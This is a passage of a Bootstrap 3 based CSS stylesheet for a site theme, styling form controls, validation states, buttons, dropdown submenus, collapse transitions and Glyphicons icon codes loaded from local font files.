  border-radius: 0 0px 0px 0;
}
.input-prepend.input-append input,
.input-prepend.input-append select,
.input-prepend.input-append .uneditable-input {
  border-radius: 0;
}
.input-prepend.input-append input + .btn-group .btn,
.input-prepend.input-append select + .btn-group .btn,
.input-prepend.input-append .uneditable-input + .btn-group .btn {
  border-radius: 0 0px 0px 0;
}
.input-prepend.input-append .add-on:first-child,
.input-prepend.input-append .btn:first-child {
  margin-right: -1px;
  border-radius: 0px 0 0 0px;
}
.input-prepend.input-append .add-on:last-child,
.input-prepend.input-append .btn:last-child {
  margin-left: -1px;
  border-radius: 0 0px 0px 0;
}
.input-prepend.input-append .btn-group:first-child {
  margin-left: 0;
}
.btn-large {
  padding: 10px 16px;
  font-size: 18px;
  border-radius: 0px;
}
.btn-large [class^="icon-"],
.btn-large [class*=" icon-"] {
  margin-top: 4px;
}
.btn-small {
  padding: 5px 10px;
  font-size: 12px;
  border-radius: 0px;
}
.btn-small [class^="icon-"],
.btn-small [class*=" icon-"] {
  margin-top: 0;
}
.btn-mini {
  padding: 2px 4px;
  font-size: 12px;
  border-radius: 0px;
}
.btn-mini [class^="icon-"],
.btn-mini [class*=" icon-"] {
  margin-top: -1px;
}

fieldset {
  padding: 0;
  margin: 0;
  border: 0;
  min-width: 0;
}
legend {
  display: block;
  width: 100%;
  padding: 0;
  margin-bottom: 20px;
  font-size: 21px;
  line-height: inherit;
  color: #444444;
  border: 0;
  border-bottom: 1px solid #e5e5e5;
}
label {
  display: inline-block;
  max-width: 100%;
  margin-bottom: 5px;
  font-weight: bold;
}
input[type="search"] {
  -webkit-box-sizing: border-box;
  -moz-box-sizing: border-box;
  box-sizing: border-box;
}
input[type="radio"],
input[type="checkbox"] {
  margin: 4px 0 0;
  margin-top: 1px \9;
  line-height: normal;
}
input[type="file"] {
  display: block;
}
input[type="range"] {
  display: block;
  width: 100%;
}
select[multiple],
select[size] {
  height: auto;
}
input[type="file"]:focus,
input[type="radio"]:focus,
input[type="checkbox"]:focus {
  outline: thin dotted;
  outline: 5px auto -webkit-focus-ring-color;
  outline-offset: -2px;
}
output {
  display: block;
  padding-top: 7px;
  font-size: 14px;
  line-height: 1.42857143;
  color: #666666;
}
.form-control {
  display: block;
  width: 100%;
  height: 34px;
  padding: 6px 12px;
  font-size: 14px;
  line-height: 1.42857143;
  color: #666666;
  background-color: #ffffff;
  background-image: none;
  border: 1px solid #cccccc;
  border-radius: 0px;
  -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075);
  box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075);
  -webkit-transition: border-color ease-in-out .15s, box-shadow ease-in-out .15s;
  -o-transition: border-color ease-in-out .15s, box-shadow ease-in-out .15s;
  transition: border-color ease-in-out .15s, box-shadow ease-in-out .15s;
}
.form-control:focus {
  border-color: #66afe9;
  outline: 0;
  -webkit-box-shadow: inset 0 1px 1px rgba(0,0,0,.075), 0 0 8px rgba(102, 175, 233, 0.6);
  box-shadow: inset 0 1px 1px rgba(0,0,0,.075), 0 0 8px rgba(102, 175, 233, 0.6);
}
.form-control::-moz-placeholder {
  color: #999999;
  opacity: 1;
}
.form-control:-ms-input-placeholder {
  color: #999999;
}
.form-control::-webkit-input-placeholder {
  color: #999999;
}
.form-control[disabled],
.form-control[readonly],
fieldset[disabled] .form-control {
  background-color: #eeeeee;
  opacity: 1;
}
.form-control[disabled],
fieldset[disabled] .form-control {
  cursor: not-allowed;
}
textarea.form-control {
  height: auto;
}
input[type="search"] {
  -webkit-appearance: none;
}
@media screen and (-webkit-min-device-pixel-ratio: 0) {
  input[type="date"],
  input[type="time"],
  input[type="datetime-local"],
  input[type="month"] {
    line-height: 34px;
  }
  input[type="date"].input-sm,
  input[type="time"].input-sm,
  input[type="datetime-local"].input-sm,
  input[type="month"].input-sm,
  .input-group-sm input[type="date"],
  .input-group-sm input[type="time"],
  .input-group-sm input[type="datetime-local"],
  .input-group-sm input[type="month"] {
    line-height: 30px;
  }
  input[type="date"].input-lg,
  input[type="time"].input-lg,
  input[type="datetime-local"].input-lg,
  input[type="month"].input-lg,
  .input-group-lg input[type="date"],
  .input-group-lg input[type="time"],
  .input-group-lg input[type="datetime-local"],
  .input-group-lg input[type="month"] {
    line-height: 45px;
  }
}
.form-group {
  margin-bottom: 15px;
}
.radio,
.checkbox {
  position: relative;
  display: block;
  margin-top: 10px;
  margin-bottom: 10px;
}
.radio label,
.checkbox label {
  min-height: 20px;
  padding-left: 20px;
  margin-bottom: 0;
  font-weight: normal;
  cursor: pointer;
}
.radio input[type="radio"],
.radio-inline input[type="radio"],
.checkbox input[type="checkbox"],
.checkbox-inline input[type="checkbox"] {
  position: absolute;
  margin-left: -20px;
  margin-top: 4px \9;
}
.radio + .radio,
.checkbox + .checkbox {
  margin-top: -5px;
}
.radio-inline,
.checkbox-inline {
  position: relative;
  display: inline-block;
  padding-left: 20px;
  margin-bottom: 0;
  vertical-align: middle;
  font-weight: normal;
  cursor: pointer;
}
.radio-inline + .radio-inline,
.checkbox-inline + .checkbox-inline {
  margin-top: 0;
  margin-left: 10px;
}
input[type="radio"][disabled],
input[type="checkbox"][disabled],
input[type="radio"].disabled,
input[type="checkbox"].disabled,
fieldset[disabled] input[type="radio"],
fieldset[disabled] input[type="checkbox"] {
  cursor: not-allowed;
}
.radio-inline.disabled,
.checkbox-inline.disabled,
fieldset[disabled] .radio-inline,
fieldset[disabled] .checkbox-inline {
  cursor: not-allowed;
}
.radio.disabled label,
.checkbox.disabled label,
fieldset[disabled] .radio label,
fieldset[disabled] .checkbox label {
  cursor: not-allowed;
}
.form-control-static {
  padding-top: 7px;
  padding-bottom: 7px;
  margin-bottom: 0;
  min-height: 34px;
}
.form-control-static.input-lg,
.form-control-static.input-sm {
  padding-left: 0;
  padding-right: 0;
}
.input-sm {
  height: 30px;
  padding: 5px 10px;
  font-size: 12px;
  line-height: 1.5;
  border-radius: 0px;
}
select.input-sm {
  height: 30px;
  line-height: 30px;
}
textarea.input-sm,
select[multiple].input-sm {
  height: auto;
}
.form-group-sm .form-control {
  height: 30px;
  padding: 5px 10px;
  font-size: 12px;
  line-height: 1.5;
  border-radius: 0px;
}
select.form-group-sm .form-control {
  height: 30px;
  line-height: 30px;
}
textarea.form-group-sm .form-control,
select[multiple].form-group-sm .form-control {
  height: auto;
}
.form-group-sm .form-control-static {
  height: 30px;
  padding: 5px 10px;
  font-size: 12px;
  line-height: 1.5;
  min-height: 32px;
}
.input-lg {
  height: 45px;
  padding: 10px 16px;
  font-size: 18px;
  line-height: 1.33;
  border-radius: 0px;
}
select.input-lg {
  height: 45px;
  line-height: 45px;
}
textarea.input-lg,
select[multiple].input-lg {
  height: auto;
}
.form-group-lg .form-control {
  height: 45px;
  padding: 10px 16px;
  font-size: 18px;
  line-height: 1.33;
  border-radius: 0px;
}
select.form-group-lg .form-control {
  height: 45px;
  line-height: 45px;
}
textarea.form-group-lg .form-control,
select[multiple].form-group-lg .form-control {
  height: auto;
}
.form-group-lg .form-control-static {
  height: 45px;
  padding: 10px 16px;
  font-size: 18px;
  line-height: 1.33;
  min-height: 38px;
}
.has-feedback {
  position: relative;
}
.has-feedback .form-control {
  padding-right: 42.5px;
}
.form-control-feedback {
  position: absolute;
  top: 0;
  right: 0;
  z-index: 2;
  display: block;
  width: 34px;
  height: 34px;
  line-height: 34px;
  text-align: center;
  pointer-events: none;
}
.input-lg + .form-control-feedback {
  width: 45px;
  height: 45px;
  line-height: 45px;
}
.input-sm + .form-control-feedback {
  width: 30px;
  height: 30px;
  line-height: 30px;
}
.has-success .help-block,
.has-success .control-label,
.has-success .radio,
.has-success .checkbox,
.has-success .radio-inline,
.has-success .checkbox-inline,
.has-success.radio label,
.has-success.checkbox label,
.has-success.radio-inline label,
.has-success.checkbox-inline label {
  color: #468847;
}
.has-success .form-control {
  border-color: #468847;
  -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075);
  box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075);
}
.has-success .form-control:focus {
  border-color: #356635;
  -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075), 0 0 6px #7aba7b;
  box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075), 0 0 6px #7aba7b;
}
.has-success .input-group-addon {
  color: #468847;
  border-color: #468847;
  background-color: #dff0d8;
}
.has-success .form-control-feedback {
  color: #468847;
}
.has-warning .help-block,
.has-warning .control-label,
.has-warning .radio,
.has-warning .checkbox,
.has-warning .radio-inline,
.has-warning .checkbox-inline,
.has-warning.radio label,
.has-warning.checkbox label,
.has-warning.radio-inline label,
.has-warning.checkbox-inline label {
  color: #c09853;
}
.has-warning .form-control {
  border-color: #c09853;
  -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075);
  box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075);
}
.has-warning .form-control:focus {
  border-color: #a47e3c;
  -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075), 0 0 6px #dbc59e;
  box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075), 0 0 6px #dbc59e;
}
.has-warning .input-group-addon {
  color: #c09853;
  border-color: #c09853;
  background-color: #fcf8e3;
}
.has-warning .form-control-feedback {
  color: #c09853;
}
.has-error .help-block,
.has-error .control-label,
.has-error .radio,
.has-error .checkbox,
.has-error .radio-inline,
.has-error .checkbox-inline,
.has-error.radio label,
.has-error.checkbox label,
.has-error.radio-inline label,
.has-error.checkbox-inline label {
  color: #b94a48;
}
.has-error .form-control {
  border-color: #b94a48;
  -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075);
  box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075);
}
.has-error .form-control:focus {
  border-color: #953b39;
  -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075), 0 0 6px #d59392;
  box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075), 0 0 6px #d59392;
}
.has-error .input-group-addon {
  color: #b94a48;
  border-color: #b94a48;
  background-color: #f2dede;
}
.has-error .form-control-feedback {
  color: #b94a48;
}
.has-feedback label ~ .form-control-feedback {
  top: 25px;
}
.has-feedback label.sr-only ~ .form-control-feedback {
  top: 0;
}
.help-block {
  display: block;
  margin-top: 5px;
  margin-bottom: 10px;
  color: #848484;
}
@media (min-width: 768px) {
  .form-inline .form-group {
    display: inline-block;
    margin-bottom: 0;
    vertical-align: middle;
  }
  .form-inline .form-control {
    display: inline-block;
    width: auto;
    vertical-align: middle;
  }
  .form-inline .form-control-static {
    display: inline-block;
  }
  .form-inline .input-group {
    display: inline-table;
    vertical-align: middle;
  }
  .form-inline .input-group .input-group-addon,
  .form-inline .input-group .input-group-btn,
  .form-inline .input-group .form-control {
    width: auto;
  }
  .form-inline .input-group > .form-control {
    width: 100%;
  }
  .form-inline .control-label {
    margin-bottom: 0;
    vertical-align: middle;
  }
  .form-inline .radio,
  .form-inline .checkbox {
    display: inline-block;
    margin-top: 0;
    margin-bottom: 0;
    vertical-align: middle;
  }
  .form-inline .radio label,
  .form-inline .checkbox label {
    padding-left: 0;
  }
  .form-inline .radio input[type="radio"],
  .form-inline .checkbox input[type="checkbox"] {
    position: relative;
    margin-left: 0;
  }
  .form-inline .has-feedback .form-control-feedback {
    top: 0;
  }
}
.form-horizontal .radio,
.form-horizontal .checkbox,
.form-horizontal .radio-inline,
.form-horizontal .checkbox-inline {
  margin-top: 0;
  margin-bottom: 0;
  padding-top: 7px;
}
.form-horizontal .radio,
.form-horizontal .checkbox {
  min-height: 27px;
}
.form-horizontal .form-group {
  margin-left: -15px;
  margin-right: -15px;
}
@media (min-width: 768px) {
  .form-horizontal .control-label {
    text-align: right;
    margin-bottom: 0;
    padding-top: 7px;
  }
}
.form-horizontal .has-feedback .form-control-feedback {
  right: 15px;
}
@media (min-width: 768px) {
  .form-horizontal .form-group-lg .control-label {
    padding-top: 14.3px;
  }
}
@media (min-width: 768px) {
  .form-horizontal .form-group-sm .control-label {
    padding-top: 6px;
  }
}
.btn {
  display: inline-block;
  margin-bottom: 0;
  font-weight: normal;
  text-align: center;
  vertical-align: middle;
  touch-action: manipulation;
  cursor: pointer;
  background-image: none;
  border: 1px solid transparent;
  white-space: nowrap;
  padding: 6px 12px;
  font-size: 14px;
  line-height: 1.42857143;
  border-radius: 0px;
  -webkit-user-select: none;
  -moz-user-select: none;
  -ms-user-select: none;
  user-select: none;
}
.btn:focus,
.btn:active:focus,
.btn.active:focus,
.btn.focus,
.btn:active.focus,
.btn.active.focus {
  outline: thin dotted;
  outline: 5px auto -webkit-focus-ring-color;
  outline-offset: -2px;
}
.btn:hover,
.btn:focus,
.btn.focus {
  color: #333333;
  text-decoration: none;
}
.btn:active,
.btn.active {
  outline: 0;
  background-image: none;
  -webkit-box-shadow: inset 0 3px 5px rgba(0, 0, 0, 0.125);
  box-shadow: inset 0 3px 5px rgba(0, 0, 0, 0.125);
}
.btn.disabled,
.btn[disabled],
fieldset[disabled] .btn {
  cursor: not-allowed;
  pointer-events: none;
  opacity: 0.65;
  filter: alpha(opacity=65);
  -webkit-box-shadow: none;
  box-shadow: none;
}
.btn-default {
  color: #333333;
  background-color: #ffffff;
  border-color: #cccccc;
}
.btn-default:hover,
.btn-default:focus,
.btn-default.focus,
.btn-default:active,
.btn-default.active,
.open > .dropdown-toggle.btn-default {
  color: #333333;
  background-color: #e6e6e6;
  border-color: #adadad;
}
.btn-default:active,
.btn-default.active,
.open > .dropdown-toggle.btn-default {
  background-image: none;
}
.btn-default.disabled,
.btn-default[disabled],
fieldset[disabled] .btn-default,
.btn-default.disabled:hover,
.btn-default[disabled]:hover,
fieldset[disabled] .btn-default:hover,
.btn-default.disabled:focus,
.btn-default[disabled]:focus,
fieldset[disabled] .btn-default:focus,
.btn-default.disabled.focus,
.btn-default[disabled].focus,
fieldset[disabled] .btn-default.focus,
.btn-default.disabled:active,
.btn-default[disabled]:active,
fieldset[disabled] .btn-default:active,
.btn-default.disabled.active,
.btn-default[disabled].active,
fieldset[disabled] .btn-default.active {
  background-color: #ffffff;
  border-color: #cccccc;
}
.btn-default .badge {
  color: #ffffff;
  background-color: #333333;
}
.btn-primary {
  color: #ffffff;
  background-color: #10bf00;
  border-color: #0ea600;
}
.btn-primary:hover,
.btn-primary:focus,
.btn-primary.focus,
.btn-primary:active,
.btn-primary.active,
.open > .dropdown-toggle.btn-primary {
  color: #ffffff;
  background-color: #0c8c00;
  border-color: #096800;
}
.btn-primary:active,
.btn-primary.active,
.open > .dropdown-toggle.btn-primary {
  background-image: none;
}
.btn-primary.disabled,
.btn-primary[disabled],
fieldset[disabled] .btn-primary,
.btn-primary.disabled:hover,
.btn-primary[disabled]:hover,
fieldset[disabled] .btn-primary:hover,
.btn-primary.disabled:focus,
.btn-primary[disabled]:focus,
fieldset[disabled] .btn-primary:focus,
.btn-primary.disabled.focus,
.btn-primary[disabled].focus,
fieldset[disabled] .btn-primary.focus,
.btn-primary.disabled:active,
.btn-primary[disabled]:active,
fieldset[disabled] .btn-primary:active,
.btn-primary.disabled.active,
.btn-primary[disabled].active,
fieldset[disabled] .btn-primary.active {
  background-color: #10bf00;
  border-color: #0ea600;
}
.btn-primary .badge {
  color: #10bf00;
  background-color: #ffffff;
}
.btn-success {
  color: #ffffff;
  background-color: #3e9b52;
  border-color: #378948;
}
.btn-success:hover,
.btn-success:focus,
.btn-success.focus,
.btn-success:active,
.btn-success.active,
.open > .dropdown-toggle.btn-success {
  color: #ffffff;
  background-color: #2f773f;
  border-color: #255d31;
}
.btn-success:active,
.btn-success.active,
.open > .dropdown-toggle.btn-success {
  background-image: none;
}
.btn-success.disabled,
.btn-success[disabled],
fieldset[disabled] .btn-success,
.btn-success.disabled:hover,
.btn-success[disabled]:hover,
fieldset[disabled] .btn-success:hover,
.btn-success.disabled:focus,
.btn-success[disabled]:focus,
fieldset[disabled] .btn-success:focus,
.btn-success.disabled.focus,
.btn-success[disabled].focus,
fieldset[disabled] .btn-success.focus,
.btn-success.disabled:active,
.btn-success[disabled]:active,
fieldset[disabled] .btn-success:active,
.btn-success.disabled.active,
.btn-success[disabled].active,
fieldset[disabled] .btn-success.active {
  background-color: #3e9b52;
  border-color: #378948;
}
.btn-success .badge {
  color: #3e9b52;
  background-color: #ffffff;
}
.btn-info {
  color: #ffffff;
  background-color: #0099cc;
  border-color: #0086b3;
}
.btn-info:hover,
.btn-info:focus,
.btn-info.focus,
.btn-info:active,
.btn-info.active,
.open > .dropdown-toggle.btn-info {
  color: #ffffff;
  background-color: #007399;
  border-color: #005875;
}
.btn-info:active,
.btn-info.active,
.open > .dropdown-toggle.btn-info {
  background-image: none;
}
.btn-info.disabled,
.btn-info[disabled],
fieldset[disabled] .btn-info,
.btn-info.disabled:hover,
.btn-info[disabled]:hover,
fieldset[disabled] .btn-info:hover,
.btn-info.disabled:focus,
.btn-info[disabled]:focus,
fieldset[disabled] .btn-info:focus,
.btn-info.disabled.focus,
.btn-info[disabled].focus,
fieldset[disabled] .btn-info.focus,
.btn-info.disabled:active,
.btn-info[disabled]:active,
fieldset[disabled] .btn-info:active,
.btn-info.disabled.active,
.btn-info[disabled].active,
fieldset[disabled] .btn-info.active {
  background-color: #0099cc;
  border-color: #0086b3;
}
.btn-info .badge {
  color: #0099cc;
  background-color: #ffffff;
}
.btn-warning {
  color: #ffffff;
  background-color: #ff8800;
  border-color: #e67a00;
}
.btn-warning:hover,
.btn-warning:focus,
.btn-warning.focus,
.btn-warning:active,
.btn-warning.active,
.open > .dropdown-toggle.btn-warning {
  color: #ffffff;
  background-color: #cc6d00;
  border-color: #a85a00;
}
.btn-warning:active,
.btn-warning.active,
.open > .dropdown-toggle.btn-warning {
  background-image: none;
}
.btn-warning.disabled,
.btn-warning[disabled],
fieldset[disabled] .btn-warning,
.btn-warning.disabled:hover,
.btn-warning[disabled]:hover,
fieldset[disabled] .btn-warning:hover,
.btn-warning.disabled:focus,
.btn-warning[disabled]:focus,
fieldset[disabled] .btn-warning:focus,
.btn-warning.disabled.focus,
.btn-warning[disabled].focus,
fieldset[disabled] .btn-warning.focus,
.btn-warning.disabled:active,
.btn-warning[disabled]:active,
fieldset[disabled] .btn-warning:active,
.btn-warning.disabled.active,
.btn-warning[disabled].active,
fieldset[disabled] .btn-warning.active {
  background-color: #ff8800;
  border-color: #e67a00;
}
.btn-warning .badge {
  color: #ff8800;
  background-color: #ffffff;
}
.btn-danger {
  color: #ffffff;
  background-color: #cc0000;
  border-color: #b30000;
}
.btn-danger:hover,
.btn-danger:focus,
.btn-danger.focus,
.btn-danger:active,
.btn-danger.active,
.open > .dropdown-toggle.btn-danger {
  color: #ffffff;
  background-color: #990000;
  border-color: #750000;
}
.btn-danger:active,
.btn-danger.active,
.open > .dropdown-toggle.btn-danger {
  background-image: none;
}
.btn-danger.disabled,
.btn-danger[disabled],
fieldset[disabled] .btn-danger,
.btn-danger.disabled:hover,
.btn-danger[disabled]:hover,
fieldset[disabled] .btn-danger:hover,
.btn-danger.disabled:focus,
.btn-danger[disabled]:focus,
fieldset[disabled] .btn-danger:focus,
.btn-danger.disabled.focus,
.btn-danger[disabled].focus,
fieldset[disabled] .btn-danger.focus,
.btn-danger.disabled:active,
.btn-danger[disabled]:active,
fieldset[disabled] .btn-danger:active,
.btn-danger.disabled.active,
.btn-danger[disabled].active,
fieldset[disabled] .btn-danger.active {
  background-color: #cc0000;
  border-color: #b30000;
}
.btn-danger .badge {
  color: #cc0000;
  background-color: #ffffff;
}
.btn-link {
  color: #10bf00;
  font-weight: normal;
  border-radius: 0;
}
.btn-link,
.btn-link:active,
.btn-link.active,
.btn-link[disabled],
fieldset[disabled] .btn-link {
  background-color: transparent;
  -webkit-box-shadow: none;
  box-shadow: none;
}
.btn-link,
.btn-link:hover,
.btn-link:focus,
.btn-link:active {
  border-color: transparent;
}
.btn-link:hover,
.btn-link:focus {
  color: #0a7300;
  text-decoration: underline;
  background-color: transparent;
}
.btn-link[disabled]:hover,
fieldset[disabled] .btn-link:hover,
.btn-link[disabled]:focus,
fieldset[disabled] .btn-link:focus {
  color: #999999;
  text-decoration: none;
}
.btn-lg,
.btn-group-lg > .btn {
  padding: 10px 16px;
  font-size: 18px;
  line-height: 1.33;
  border-radius: 0px;
}
.btn-sm,
.btn-group-sm > .btn {
  padding: 5px 10px;
  font-size: 12px;
  line-height: 1.5;
  border-radius: 0px;
}
.btn-xs,
.btn-group-xs > .btn {
  padding: 1px 5px;
  font-size: 12px;
  line-height: 1.5;
  border-radius: 0px;
}
.btn-block {
  display: block;
  width: 100%;
}
.btn-block + .btn-block {
  margin-top: 5px;
}
input[type="submit"].btn-block,
input[type="reset"].btn-block,
input[type="button"].btn-block {
  width: 100%;
}
.dropdown-submenu {
  position: relative;
}
.dropdown-submenu > .dropdown-menu {
  top: 0;
  left: 100%;
  margin-top: -5px;
  margin-left: -1px;
}
.dropdown-submenu.open > .dropdown-menu {
  display: block;
}
.dropdown-submenu > .dropdown-menu {
  border-radius: 0px;
}
.dropdown-submenu > a:after {
  display: block;
  content: " ";
  float: right;
  width: 0;
  height: 0;
  border-color: transparent;
  border-style: solid;
  border-width: 5px 0 5px 5px;
  border-left-color: #111111;
  margin-top: 5px;
  margin-right: -5px;
}
.dropdown-submenu.open > a:after {
  border-left-color: #ffffff;
}

.fade {
  opacity: 0;
  -webkit-transition: opacity 0.15s linear;
  -o-transition: opacity 0.15s linear;
  transition: opacity 0.15s linear;
}
.fade.in {
  opacity: 1;
}
.collapse {
  display: none;
}
.collapse.in {
  display: block;
}
tr.collapse.in {
  display: table-row;
}
tbody.collapse.in {
  display: table-row-group;
}
.collapsing {
  position: relative;
  height: 0;
  overflow: hidden;
  -webkit-transition-property: height, visibility;
  transition-property: height, visibility;
  -webkit-transition-duration: 0.35s;
  transition-duration: 0.35s;
  -webkit-transition-timing-function: ease;
  transition-timing-function: ease;
}
@font-face {
  font-family: 'Glyphicons Halflings';
  src: url('../../../../../../plugins/system/t3/base-bs3/bootstrap/fonts/glyphicons-halflings-regular.eot');
  src: url('../../../../../../plugins/system/t3/base-bs3/bootstrap/fonts/glyphicons-halflings-regular.eot?#iefix') format('embedded-opentype'), url('../../../../../../plugins/system/t3/base-bs3/bootstrap/fonts/glyphicons-halflings-regular.woff2') format('woff2'), url('../../../../../../plugins/system/t3/base-bs3/bootstrap/fonts/glyphicons-halflings-regular.woff') format('woff'), url('../../../../../../plugins/system/t3/base-bs3/bootstrap/fonts/glyphicons-halflings-regular.ttf') format('truetype'), url('../../../../../../plugins/system/t3/base-bs3/bootstrap/fonts/glyphicons-halflings-regular.svg#glyphicons_halflingsregular') format('svg');
}
.glyphicon {
  position: relative;
  top: 1px;
  display: inline-block;
  font-family: 'Glyphicons Halflings';
  font-style: normal;
  font-weight: normal;
  line-height: 1;
  -webkit-font-smoothing: antialiased;
  -moz-osx-font-smoothing: grayscale;
}
.glyphicon-asterisk:before {
  content: "\2a";
}
.glyphicon-plus:before {
  content: "\2b";
}
.glyphicon-euro:before,
.glyphicon-eur:before {
  content: "\20ac";
}
.glyphicon-minus:before {
  content: "\2212";
}
.glyphicon-cloud:before {
  content: "\2601";
}
.glyphicon-envelope:before {
  content: "\2709";
}
.glyphicon-pencil:before {
  content: "\270f";
}
.glyphicon-glass:before {
  content: "\e001";
}
.glyphicon-music:before {
  content: "\e002";
}
.glyphicon-search:before {
  content: "\e003";
}
.glyphicon-heart:before {
  content: "\e005";
}
.glyphicon-star:before {
  content: "\e006";
}
.glyphicon-star-empty:before {
  content: "\e007";
}
.glyphicon-user:before {
  content: "\e008";
}
.glyphicon-film:before {
  content: "\e009";
}
.glyphicon-th-large:before {
  content: "\e010";
}
.glyphicon-th:before {
  content: "\e011";
}
.glyphicon-th-list:before {
  content: "\e012";
}
.glyphicon-ok:before {
  content: "\e013";
}
.glyphicon-remove:before {
  content: "\e014";
}
.glyphicon-zoom-in:before {
  content: "\e015";
}
.glyphicon-zoom-out:before {
  content: "\e016";
}
.glyphicon-off:before {
  content: "\e017";
}
.glyphicon-signal:before {
  content: "\e018";
}
.glyphicon-cog:before {
  content: "\e019";
}
.glyphicon-trash:before {
  content: "\e020";
}
.glyphicon-home:before {
  content: "\e021";
}
.glyphicon-file:before {
  content: "\e022";
}
.glyphicon-time:before {
  content: "\e023";
}
.glyphicon-road:before {
  content: "\e024";
}
.glyphicon-download-alt:before {
  content: "\e025";
}
.glyphicon-download:before {
  content: "\e026";
}
.glyphicon-upload:before {
  content: "\e027";
}
.glyphicon-inbox:before {
  content: "\e028";
}
.glyphicon-play-circle:before {
  content: "\e029";
}
.glyphicon-repeat:before {
  content: "\e030";
}
.glyphicon-refresh:before {
  content: "\e031";
}
.glyphicon-list-alt:before {
  content: "\e032";
}
.glyphicon-lock:before {
  content: "\e033";
}
.glyphicon-flag:before {
  content: "\e034";
}
.glyphicon-headphones:before {
  content: "\e035";
}
.glyphicon-volume-off:before {
  content: "\e036";
}
.glyphicon-volume-down:before {
  content: "\e037";
}
.glyphicon-volume-up:before {
  content: "\e038";
}
.glyphicon-qrcode:before {
  content: "\e039";
}
.glyphicon-barcode:before {
  content: "\e040";
}
.glyphicon-tag:before {
  content: "\e041";
}
.glyphicon-tags:before {
  content: "\e042";
}
.glyphicon-book:before {
  content: "\e043";
}
.glyphicon-bookmark:before {
  content: "\e044";
}
.glyphicon-print:before {
  content: "\e045";
}
.glyphicon-camera:before {
  content: "\e046";
}
.glyphicon-font:before {
  content: "\e047";
}
.glyphicon-bold:before {
  content: "\e048";
}
.glyphicon-italic:before {
  content: "\e049";
}
.glyphicon-text-height:before {
  content: "\e050";
}
.glyphicon-text-width:before {
  content: "\e051";
}
.glyphicon-align-left:before {
  content: "\e052";
}
.glyphicon-align-center:before {
  content: "\e053";
}
.glyphicon-align-right:before {
  content: "\e054";
}
.glyphicon-align-justify:before {
  content: "\e055";
}
.glyphicon-list:before {
  content: "\e056";
}
.glyphicon-indent-left:before {
  content: "\e057";
}
.glyphicon-indent-right:before {
  content: "\e058";
}
.glyphicon-facetime-video:before {
  content: "\e059";
}
.glyphicon-picture:before {
  content: "\e060";
}
.glyphicon-map-marker:before {
  content: "\e062";
}
.glyphicon-adjust:before {
  content: "\e063";
}
.glyphicon-tint:before {
  content: "\e064";
}
.glyphicon-edit:before {
  content: "\e065";
}
.glyphicon-share:before {
  content: "\e066";
}
.glyphicon-check:before {
  content: "\e067";
}
.glyphicon-move:before {
  content: "\e068";
}
.glyphicon-step-backward:before {
  content: "\e069";
}
.glyphicon-fast-backward:before {
  content: "\e070";
}
.glyphicon-backward:before {
  content: "\e071";
}
.glyphicon-play:before {
  content: "\e072";
}
.glyphicon-pause:before {
  content: "\e073";
}
.glyphicon-stop:before {
  content: "\e074";
}
.glyphicon-forward:before {
  content: "\e075";
}
.glyphicon-fast-forward:before {
  content: "\e076";
}
.glyphicon-step-forward:before {
  content: "\e077";
}
.glyphicon-eject:before {
  content: "\e078";
}
.glyphicon-chevron-left:before {
  content: "\e079";
}
.glyphicon-chevron-right:before {
  content: "\e080";
}
.glyphicon-plus-sign:before {
  content: "\e081";
}
.glyphicon-minus-sign:before {
  content: "\e082";
}
.glyphicon-remove-sign:before {
  content: "\e083";
}
.glyphicon-ok-sign:before {
  content: "\e084";
}
.glyphicon-question-sign:before {
  content: "\e085";
}
.glyphicon-info-sign:before {
  content: "\e086";
}
.glyphicon-screenshot:before {
  content: "\e087";
}
.glyphicon-remove-circle:before {
  content: "\e088";
}
.glyphicon-ok-circle:before {
  content: "\e089";
}
.glyphicon-ban-circle:before {
  content: "\e090";
}
.glyphicon-arrow-left:before {
  content: "\e091";
}
.glyphicon-arrow-right:before {
  content: "\e092";
}
.glyphicon-arrow-up:before {
  content: "\e093";
}
.glyphicon-arrow-down:before {
  content: "\e094";
}
.glyphicon-share-alt:before {
  content: "\e095";
}
.glyphicon-resize-full:before {
  content: "\e096";
}
.glyphicon-resize-small:before {
  content: "\e097";
}
.glyphicon-exclamation-sign:before {
  content: "\e101";
}
.glyphicon-gift:before {
  content: "\e102";
}
.glyphicon-leaf:before {
  content: "\e103";
}
.glyphicon-fire:before {
  content: "\e104";
}
.glyphicon-eye-open:before {
  content: "\e105";
}
.glyphicon-eye-close:before {
  content: "\e106";
}
.glyphicon-warning-sign:before {
  content: "\e107";
}
.glyphicon-plane:before {
  content: "\e108";
}
.glyphicon-calendar:before {
  content: "\e109";
}
.glyphicon-random:before {
  content: "\e110";
}
.glyphicon-comment:before {
  content: "\e111";
}
.glyphicon-magnet:before {
  content: "\e112";
}
.glyphicon-chevron-up:before {
  content: "\e113";
}
.glyphicon-chevron-down:before {
  content: "\e114";
}
.glyphicon-retweet:before {
  content: "\e115";
}
.glyphicon-shopping-cart:before {
  content: "\e116";
}
.glyphicon-folder-close:before {
  content: "\e117";
}
.glyphicon-folder-open:before {
  content: "\e118";
}
.glyphicon-resize-vertical:before {
  content: "\e119";
}
.glyphicon-resize-horizontal:before {
  content: "\e120";
}
.glyphicon-hdd:before {
  content: "\e121";
}
.glyphicon-bullhorn:before {
  content: "\e122";
}
.glyphicon-bell:before {
  content: "\e123";
}
.glyphicon-certificate:before {
  content: "\e124";
}
.glyphicon-thumbs-up:before {
  content: "\e125";
}
.glyphicon-thumbs-down:before {
  content: "\e126";
}
.glyphicon-hand-right:before {
  content: "\e127";
}
.glyphicon-hand-left:before {
  content: "\e128";
}
.glyphicon-hand-up:before {
  content: "\e129";
}
.glyphicon-hand-down:before {
  content: "\e130";
}
.glyphicon-circle-arrow-right:before {
  content: "\e131";
}
.glyphicon-circle-arrow-left:before {
  content: "\e132";
}
.glyphicon-circle-arrow-up:before {
  content: "\e133";
}
